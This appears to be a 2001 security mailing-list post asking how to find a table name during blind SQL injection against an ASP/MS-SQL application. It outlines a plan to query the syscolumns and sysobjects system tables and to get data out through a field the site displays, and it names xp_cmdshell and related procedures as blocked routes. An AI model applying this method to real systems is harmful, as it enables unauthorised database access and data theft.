I have a buggy web application which takes an input field and places it in the middle of an SQL query, then executes it against a MS-SQL server. I can rewrite the query because single quotes are used to encapsulate the input field, and the script doesn't strip out the single quote character. I pieced together most of the original SQL by viewing the ODBC error messages the IIS server spits out when I mangle the query: SELECT ? FROM ? WHERE KnownColumnName = '%input%' The backend SQL server is behind heavy incoming and outgoing packet filters, so just using xp_cmdshell, xp_sendmail, or sp_makewebtask wont cut it. There is however an interface on the web site which displays certain fields from the same table which the above query select's from. If take the output of one query and insert it into the field of this table, I could theoretically view the results by browsing this web interface. The problem is that I don't know the name of the table that my query is working on, so I cant run an update or insert query until I figure that out. I went through a massive amount of common table names without much luck, so does anyone know of a method to determine the name of the table? Keep in mind that I can't actually view the results of any query, because the ASP script is treating the return value as a boolean. Is there a way to select the object ID of known column name from the syscolumns metatable, pass that object ID into another subselect against the sysobjects metatable to get the table name, and finally use that table as part of a final query? -HD
This archive was generated by hypermail 2b30 : Sat May 26 2001 - 23:40:05 PDT